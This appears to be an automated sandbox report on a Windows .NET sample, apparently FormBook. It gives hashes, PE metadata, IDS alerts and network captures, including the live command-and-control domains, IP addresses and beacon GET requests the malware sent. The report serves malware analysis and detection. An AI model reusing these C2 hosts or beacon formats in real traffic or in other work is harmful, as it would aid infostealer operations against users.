	UwwOF5CGBp.exe	Get hash	malicious	Browse	183.181.96.16
	cu8KB5if2T	Get hash	malicious	Browse	157.112.148.25
	kEZpozRREF	Get hash	malicious	Browse	160.27.203.237
	CDcUegnLSd	Get hash	malicious	Browse	160.27.203.212
	00340434296886123692.exe	Get hash	malicious	Browse	183.181.96.71
	MDM 467574385758 SKTPCC AFRICAGM64635664.exe	Get hash	malicious	Browse	183.181.96.46
	sora.x86	Get hash	malicious	Browse	182.49.57.28
	jKira.arm7	Get hash	malicious	Browse	133.167.92.111
	dark.x86	Get hash	malicious	Browse	112.78.226.191
	sprogr.exe	Get hash	malicious	Browse	210.188.201.66
	77dsREO8Me.exe	Get hash	malicious	Browse	183.181.96.122
	Hua Joo Success Industry.xlsx	Get hash	malicious	Browse	183.181.96.122
	ATT93774.HTM	Get hash	malicious	Browse	219.94.203.180
BODIS-NJUS	010013.exe	Get hash	malicious	Browse	199.59.242.153
	XaTgTJhfol.exe	Get hash	malicious	Browse	199.59.242.153
	6pa7yRpcFt.exe	Get hash	malicious	Browse	199.59.242.153
	drolnux.exe	Get hash	malicious	Browse	199.59.242.153
	Emask230921doc.exe	Get hash	malicious	Browse	199.59.242.153
	Invoice Packing list.exe	Get hash	malicious	Browse	199.59.242.153
	D8043D746DC108AC0966B502B68DDEABA575E841EDFA2.exe	Get hash	malicious	Browse	199.59.242.153
	Productivity.exe	Get hash	malicious	Browse	199.59.242.153
	Productivity.exe	Get hash	malicious	Browse	199.59.242.153
	kIWGxQYKYO.exe	Get hash	malicious	Browse	199.59.242.153
	PO 1,5001993 21118.exe	Get hash	malicious	Browse	199.59.242.153
	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Get hash	malicious	Browse	199.59.242.153
	RFQ_Beijing Chengruisi Manufacturing_pdf.exe	Get hash	malicious	Browse	199.59.242.153
	SQLPLUS.EXE	Get hash	malicious	Browse	199.59.242.153
	TNT 07833955.exe	Get hash	malicious	Browse	199.59.242.153
	LogJhhPPyK.exe	Get hash	malicious	Browse	199.59.242.153
	PO.exe	Get hash	malicious	Browse	199.59.242.153
	D1B9D1321F517D78BC0D1D03C5ED3C20A1CCB85BF755B.exe	Get hash	malicious	Browse	199.59.242.153
	pay.exe	Get hash	malicious	Browse	199.59.242.153
	DOC.exe	Get hash	malicious	Browse	199.59.242.153

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wellis Inquiry.exe.log Download File
Process:	C:\Users\user\Desktop\Wellis Inquiry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.925371225202555
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Wellis Inquiry.exe
File size:	337408
MD5:	c357a8010e661a49df2e813bd22590b6
SHA1:	08ecd005e1449ec97d0405e83649686ae35f6286
SHA256:	eef137583da6deb4a1be9882cede6cec5112b74ae79c0773f45b13346c5b2890
SHA512:	71957a0cd597213808b15b1abe9ce3df07889627b4a1b849362df07de6da3984803c6b2e6487338375a558dc9c1f0db32aee42fde89cee305078c22d6b92890e
SSDEEP:	6144:YaX+sbCdgMkhBJDxtvArlcq90N9prggZmNqoPjLfsPbU9wgJlhjb3BB5NAwg6oBm:Y/pd7SBBArlMN9FsrPXETWwa53BB5NAk
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga..............0..............:... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x453ab2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x616787BC [Thu Oct 14 01:28:28 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x53a60	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x54000	0x5d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x56000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x51ab8	0x51c00	False	0.952127532492	data	7.93897204497	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x54000	0x5d4	0x600	False	0.4296875	data	4.15892523316	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x56000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x54090	0x344	data
RT_MANIFEST	0x543e4	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2015 - 2021
Assembly Version	1.0.0.0
InternalName	MutexAccessRu.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	Win UsbInit
ProductVersion	1.0.0.0
FileDescription	Win UsbInit
OriginalFilename	MutexAccessRu.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/14/21-07:29:45.850339	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49808	80	192.168.2.4	183.90.240.3
10/14/21-07:29:45.850339	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49808	80	192.168.2.4	183.90.240.3
10/14/21-07:29:45.850339	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49808	80	192.168.2.4	183.90.240.3
10/14/21-07:29:51.188764	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49814	80	192.168.2.4	34.102.136.180
10/14/21-07:29:51.188764	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49814	80	192.168.2.4	34.102.136.180
10/14/21-07:29:51.188764	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49814	80	192.168.2.4	34.102.136.180
10/14/21-07:29:51.303333	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49814	34.102.136.180	192.168.2.4
10/14/21-07:29:56.615066	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49818	80	192.168.2.4	151.106.117.36
10/14/21-07:29:56.615066	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49818	80	192.168.2.4	151.106.117.36
10/14/21-07:29:56.615066	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49818	80	192.168.2.4	151.106.117.36
10/14/21-07:29:57.113888	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49818	151.106.117.36	192.168.2.4
10/14/21-07:30:17.527386	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49842	80	192.168.2.4	199.59.242.153
10/14/21-07:30:17.527386	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49842	80	192.168.2.4	199.59.242.153
10/14/21-07:30:17.527386	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49842	80	192.168.2.4	199.59.242.153
10/14/21-07:30:28.557863	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49847	23.227.38.74	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2021 07:29:45.562988997 CEST	49808	80	192.168.2.4	183.90.240.3
Oct 14, 2021 07:29:45.846936941 CEST	80	49808	183.90.240.3	192.168.2.4
Oct 14, 2021 07:29:45.850227118 CEST	49808	80	192.168.2.4	183.90.240.3
Oct 14, 2021 07:29:45.850338936 CEST	49808	80	192.168.2.4	183.90.240.3
Oct 14, 2021 07:29:46.134744883 CEST	80	49808	183.90.240.3	192.168.2.4
Oct 14, 2021 07:29:46.135214090 CEST	80	49808	183.90.240.3	192.168.2.4
Oct 14, 2021 07:29:46.135237932 CEST	80	49808	183.90.240.3	192.168.2.4
Oct 14, 2021 07:29:46.135498047 CEST	49808	80	192.168.2.4	183.90.240.3
Oct 14, 2021 07:29:46.135566950 CEST	49808	80	192.168.2.4	183.90.240.3
Oct 14, 2021 07:29:46.421039104 CEST	80	49808	183.90.240.3	192.168.2.4
Oct 14, 2021 07:29:51.170027971 CEST	49814	80	192.168.2.4	34.102.136.180
Oct 14, 2021 07:29:51.187925100 CEST	80	49814	34.102.136.180	192.168.2.4
Oct 14, 2021 07:29:51.188422918 CEST	49814	80	192.168.2.4	34.102.136.180
Oct 14, 2021 07:29:51.188764095 CEST	49814	80	192.168.2.4	34.102.136.180
Oct 14, 2021 07:29:51.206609011 CEST	80	49814	34.102.136.180	192.168.2.4
Oct 14, 2021 07:29:51.303333044 CEST	80	49814	34.102.136.180	192.168.2.4
Oct 14, 2021 07:29:51.303390026 CEST	80	49814	34.102.136.180	192.168.2.4
Oct 14, 2021 07:29:51.303857088 CEST	49814	80	192.168.2.4	34.102.136.180
Oct 14, 2021 07:29:51.303914070 CEST	49814	80	192.168.2.4	34.102.136.180
Oct 14, 2021 07:29:51.617247105 CEST	49814	80	192.168.2.4	34.102.136.180
Oct 14, 2021 07:29:51.635545015 CEST	80	49814	34.102.136.180	192.168.2.4
Oct 14, 2021 07:29:56.355865955 CEST	49818	80	192.168.2.4	151.106.117.36
Oct 14, 2021 07:29:56.609545946 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:56.609750986 CEST	49818	80	192.168.2.4	151.106.117.36
Oct 14, 2021 07:29:56.615066051 CEST	49818	80	192.168.2.4	151.106.117.36
Oct 14, 2021 07:29:56.867995977 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:57.113888025 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:57.113965988 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:57.114002943 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:57.114037037 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:57.114070892 CEST	49818	80	192.168.2.4	151.106.117.36
Oct 14, 2021 07:29:57.114078999 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:57.114100933 CEST	49818	80	192.168.2.4	151.106.117.36
Oct 14, 2021 07:29:57.114115953 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:57.114142895 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:57.114168882 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:57.114192963 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:57.114217997 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:57.114242077 CEST	49818	80	192.168.2.4	151.106.117.36
Oct 14, 2021 07:29:57.114244938 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:29:57.114272118 CEST	49818	80	192.168.2.4	151.106.117.36
Oct 14, 2021 07:29:57.114362955 CEST	49818	80	192.168.2.4	151.106.117.36
Oct 14, 2021 07:29:57.114530087 CEST	49818	80	192.168.2.4	151.106.117.36
Oct 14, 2021 07:29:57.368109941 CEST	80	49818	151.106.117.36	192.168.2.4
Oct 14, 2021 07:30:12.273660898 CEST	49841	80	192.168.2.4	104.21.2.218
Oct 14, 2021 07:30:12.289676905 CEST	80	49841	104.21.2.218	192.168.2.4
Oct 14, 2021 07:30:12.290152073 CEST	49841	80	192.168.2.4	104.21.2.218
Oct 14, 2021 07:30:12.290184021 CEST	49841	80	192.168.2.4	104.21.2.218
Oct 14, 2021 07:30:12.306087971 CEST	80	49841	104.21.2.218	192.168.2.4
Oct 14, 2021 07:30:12.313358068 CEST	80	49841	104.21.2.218	192.168.2.4
Oct 14, 2021 07:30:12.313596010 CEST	80	49841	104.21.2.218	192.168.2.4
Oct 14, 2021 07:30:12.313697100 CEST	49841	80	192.168.2.4	104.21.2.218
Oct 14, 2021 07:30:12.313725948 CEST	49841	80	192.168.2.4	104.21.2.218
Oct 14, 2021 07:30:12.330281019 CEST	80	49841	104.21.2.218	192.168.2.4
Oct 14, 2021 07:30:17.426793098 CEST	49842	80	192.168.2.4	199.59.242.153
Oct 14, 2021 07:30:17.526969910 CEST	80	49842	199.59.242.153	192.168.2.4
Oct 14, 2021 07:30:17.527101040 CEST	49842	80	192.168.2.4	199.59.242.153
Oct 14, 2021 07:30:17.527385950 CEST	49842	80	192.168.2.4	199.59.242.153
Oct 14, 2021 07:30:17.627717972 CEST	80	49842	199.59.242.153	192.168.2.4
Oct 14, 2021 07:30:17.628267050 CEST	80	49842	199.59.242.153	192.168.2.4
Oct 14, 2021 07:30:17.628300905 CEST	80	49842	199.59.242.153	192.168.2.4
Oct 14, 2021 07:30:17.628323078 CEST	80	49842	199.59.242.153	192.168.2.4
Oct 14, 2021 07:30:17.628499985 CEST	49842	80	192.168.2.4	199.59.242.153
Oct 14, 2021 07:30:17.628571987 CEST	49842	80	192.168.2.4	199.59.242.153
Oct 14, 2021 07:30:28.493421078 CEST	49847	80	192.168.2.4	23.227.38.74
Oct 14, 2021 07:30:28.509732962 CEST	80	49847	23.227.38.74	192.168.2.4
Oct 14, 2021 07:30:28.510006905 CEST	49847	80	192.168.2.4	23.227.38.74
Oct 14, 2021 07:30:28.510090113 CEST	49847	80	192.168.2.4	23.227.38.74
Oct 14, 2021 07:30:28.525974035 CEST	80	49847	23.227.38.74	192.168.2.4
Oct 14, 2021 07:30:28.557862997 CEST	80	49847	23.227.38.74	192.168.2.4
Oct 14, 2021 07:30:28.557920933 CEST	80	49847	23.227.38.74	192.168.2.4
Oct 14, 2021 07:30:28.557960033 CEST	80	49847	23.227.38.74	192.168.2.4
Oct 14, 2021 07:30:28.557998896 CEST	80	49847	23.227.38.74	192.168.2.4
Oct 14, 2021 07:30:28.558028936 CEST	80	49847	23.227.38.74	192.168.2.4
Oct 14, 2021 07:30:28.558054924 CEST	49847	80	192.168.2.4	23.227.38.74
Oct 14, 2021 07:30:28.558067083 CEST	49847	80	192.168.2.4	23.227.38.74
Oct 14, 2021 07:30:28.558100939 CEST	80	49847	23.227.38.74	192.168.2.4
Oct 14, 2021 07:30:28.558126926 CEST	80	49847	23.227.38.74	192.168.2.4
Oct 14, 2021 07:30:28.558146954 CEST	49847	80	192.168.2.4	23.227.38.74
Oct 14, 2021 07:30:28.558171988 CEST	49847	80	192.168.2.4	23.227.38.74
Oct 14, 2021 07:30:28.576592922 CEST	49847	80	192.168.2.4	23.227.38.74

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2021 07:29:45.284503937 CEST	56794	53	192.168.2.4	8.8.8.8
Oct 14, 2021 07:29:45.550026894 CEST	53	56794	8.8.8.8	192.168.2.4
Oct 14, 2021 07:29:51.145488024 CEST	56627	53	192.168.2.4	8.8.8.8
Oct 14, 2021 07:29:51.167728901 CEST	53	56627	8.8.8.8	192.168.2.4
Oct 14, 2021 07:29:56.321822882 CEST	56621	53	192.168.2.4	8.8.8.8
Oct 14, 2021 07:29:56.353691101 CEST	53	56621	8.8.8.8	192.168.2.4
Oct 14, 2021 07:30:07.181576967 CEST	63116	53	192.168.2.4	8.8.8.8
Oct 14, 2021 07:30:07.220613956 CEST	53	63116	8.8.8.8	192.168.2.4
Oct 14, 2021 07:30:12.243588924 CEST	64078	53	192.168.2.4	8.8.8.8
Oct 14, 2021 07:30:12.267743111 CEST	53	64078	8.8.8.8	192.168.2.4
Oct 14, 2021 07:30:17.323776960 CEST	64801	53	192.168.2.4	8.8.8.8
Oct 14, 2021 07:30:17.425107002 CEST	53	64801	8.8.8.8	192.168.2.4
Oct 14, 2021 07:30:22.664800882 CEST	51255	53	192.168.2.4	8.8.8.8
Oct 14, 2021 07:30:22.688800097 CEST	53	51255	8.8.8.8	192.168.2.4
Oct 14, 2021 07:30:28.433368921 CEST	52337	53	192.168.2.4	8.8.8.8
Oct 14, 2021 07:30:28.462132931 CEST	53	52337	8.8.8.8	192.168.2.4
Oct 14, 2021 07:30:33.582624912 CEST	55046	53	192.168.2.4	8.8.8.8
Oct 14, 2021 07:30:33.607409954 CEST	53	55046	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 14, 2021 07:29:45.284503937 CEST	192.168.2.4	8.8.8.8	0x5aeb	Standard query (0)	www.marunouchi1.com	A (IP address)	IN (0x0001)
Oct 14, 2021 07:29:51.145488024 CEST	192.168.2.4	8.8.8.8	0x8c07	Standard query (0)	www.psychedeliccosmetics.com	A (IP address)	IN (0x0001)
Oct 14, 2021 07:29:56.321822882 CEST	192.168.2.4	8.8.8.8	0x2138	Standard query (0)	www.aceserial.xyz	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:07.181576967 CEST	192.168.2.4	8.8.8.8	0xaaa7	Standard query (0)	www.blackmagiccomics.com	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:12.243588924 CEST	192.168.2.4	8.8.8.8	0xa1cc	Standard query (0)	www.ebookgratis.online	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:17.323776960 CEST	192.168.2.4	8.8.8.8	0x3ce0	Standard query (0)	www.ovmfinacial.com	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:22.664800882 CEST	192.168.2.4	8.8.8.8	0x9df8	Standard query (0)	www.richartware.com	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:28.433368921 CEST	192.168.2.4	8.8.8.8	0xbb3c	Standard query (0)	www.dollpartyla.com	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:33.582624912 CEST	192.168.2.4	8.8.8.8	0x375b	Standard query (0)	www.quickcarehomeopathic.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 14, 2021 07:29:45.550026894 CEST	8.8.8.8	192.168.2.4	0x5aeb	No error (0)	www.marunouchi1.com		183.90.240.3	A (IP address)	IN (0x0001)
Oct 14, 2021 07:29:51.167728901 CEST	8.8.8.8	192.168.2.4	0x8c07	No error (0)	www.psychedeliccosmetics.com	psychedeliccosmetics.com		CNAME (Canonical name)	IN (0x0001)
Oct 14, 2021 07:29:51.167728901 CEST	8.8.8.8	192.168.2.4	0x8c07	No error (0)	psychedeliccosmetics.com		34.102.136.180	A (IP address)	IN (0x0001)
Oct 14, 2021 07:29:56.353691101 CEST	8.8.8.8	192.168.2.4	0x2138	No error (0)	www.aceserial.xyz	aceserial.xyz		CNAME (Canonical name)	IN (0x0001)
Oct 14, 2021 07:29:56.353691101 CEST	8.8.8.8	192.168.2.4	0x2138	No error (0)	aceserial.xyz		151.106.117.36	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:07.220613956 CEST	8.8.8.8	192.168.2.4	0xaaa7	Name error (3)	www.blackmagiccomics.com	none	none	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:12.267743111 CEST	8.8.8.8	192.168.2.4	0xa1cc	No error (0)	www.ebookgratis.online		104.21.2.218	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:12.267743111 CEST	8.8.8.8	192.168.2.4	0xa1cc	No error (0)	www.ebookgratis.online		172.67.129.186	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:17.425107002 CEST	8.8.8.8	192.168.2.4	0x3ce0	No error (0)	www.ovmfinacial.com		199.59.242.153	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:22.688800097 CEST	8.8.8.8	192.168.2.4	0x9df8	Name error (3)	www.richartware.com	none	none	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:28.462132931 CEST	8.8.8.8	192.168.2.4	0xbb3c	No error (0)	www.dollpartyla.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Oct 14, 2021 07:30:28.462132931 CEST	8.8.8.8	192.168.2.4	0xbb3c	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:33.607409954 CEST	8.8.8.8	192.168.2.4	0x375b	No error (0)	www.quickcarehomeopathic.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Oct 14, 2021 07:30:33.607409954 CEST	8.8.8.8	192.168.2.4	0x375b	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:33.607409954 CEST	8.8.8.8	192.168.2.4	0x375b	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:33.607409954 CEST	8.8.8.8	192.168.2.4	0x375b	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:33.607409954 CEST	8.8.8.8	192.168.2.4	0x375b	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:33.607409954 CEST	8.8.8.8	192.168.2.4	0x375b	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:33.607409954 CEST	8.8.8.8	192.168.2.4	0x375b	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Oct 14, 2021 07:30:33.607409954 CEST	8.8.8.8	192.168.2.4	0x375b	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.marunouchi1.com

www.psychedeliccosmetics.com

www.aceserial.xyz

www.ebookgratis.online

www.ovmfinacial.com

www.dollpartyla.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49808	183.90.240.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 07:29:45.850338936 CEST	2545	OUT	GET /ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ HTTP/1.1 Host: www.marunouchi1.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 14, 2021 07:29:46.135214090 CEST	2546	IN	HTTP/1.1 302 Found Server: nginx Date: Thu, 14 Oct 2021 05:29:46 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 312 Connection: close Location: https://www.marunouchi1.com/ag9v/?9rq=RZxJGV19NODz6/sPl50rcsjPCmhff0B2cQNSD9XNHlzuAkz3tWy1tz3gnsv2II3OKfXw&BFQ=5jI0jhMHA0hx_ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 72 75 6e 6f 75 63 68 69 31 2e 63 6f 6d 2f 61 67 39 76 2f 3f 39 72 71 3d 52 5a 78 4a 47 56 31 39 4e 4f 44 7a 36 2f 